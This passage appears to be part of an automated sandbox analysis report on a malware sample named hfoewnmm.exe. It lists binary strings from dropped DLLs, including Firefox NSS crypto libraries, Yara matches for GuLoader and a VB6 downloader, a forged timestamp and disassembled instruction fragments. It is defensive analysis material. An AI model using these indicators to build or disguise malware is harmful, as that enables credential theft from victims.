            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127208242.000000001F2D4000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: hfoewnmm.exe, 00000005.00000003.2128331675.000000001F330000.00000004.00000001.sdmp, freebl3.dll.5.dr
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130202575.000000001FC44000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130295141.000000001FC54000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130986178.000000001FCF0000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130881671.000000001FCC8000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr
            Source: Binary string: msvcp140.i386.pdb source: hfoewnmm.exe, 00000005.00000003.2128903368.000000001E854000.00000004.00000001.sdmp, msvcp140.dll.5.dr
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.5.dr
            Source: Binary string: ucrtbase.pdbUGP source: hfoewnmm.exe, 00000005.00000003.2131995490.000000001FD20000.00000004.00000001.sdmp, ucrtbase.dll.5.dr
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: hfoewnmm.exe, 00000005.00000003.2131902310.000000001F280000.00000004.00000001.sdmp, nssdbm3.dll.5.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130347616.000000001FC68000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.5.dr
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130225554.000000001FC48000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130864345.000000001FCC4000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130962839.000000001FCEC000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130372042.000000001FC6C000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.5.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.5.dr
            Source: Binary string: vcruntime140.i386.pdb source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130986178.000000001FCF0000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: hfoewnmm.exe, 00000005.00000003.2131902310.000000001F280000.00000004.00000001.sdmp, nssdbm3.dll.5.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.5.dr
            Source: Binary string: msvcp140.i386.pdbGCTL source: hfoewnmm.exe, 00000005.00000003.2128903368.000000001E854000.00000004.00000001.sdmp, msvcp140.dll.5.dr
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2126896199.000000001FE38000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131037127.000000001FD10000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127011668.000000001FE38000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130372042.000000001FC6C000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127758205.000000001FE38000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.5.dr

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: Process Memory Space: hfoewnmm.exe PID: 2528, type: MEMORY
            Binary contains a suspicious time stampShow sources
            Source: initial sampleStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
            Yara detected VB6 Downloader GenericShow sources
            Source: Yara matchFile source: Process Memory Space: hfoewnmm.exe PID: 2528, type: MEMORY
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_0040544E push cs; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_0040586B pushad ; iretd
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00403C00 push FFFFFFAAh; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_0040543A push cs; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_004038D7 push ds; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_0040594C push ds; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00402566 pushad ; iretd
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00402655 pushfd ; iretd
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00403AD0 push esi; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00404737 push ebx; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_0040233B pushad ; iretd
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00402BD9 push ecx; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00403BDA push FFFFFFAAh; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00403BBD push edx; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 5_3_1F2D850F pushfd ; ret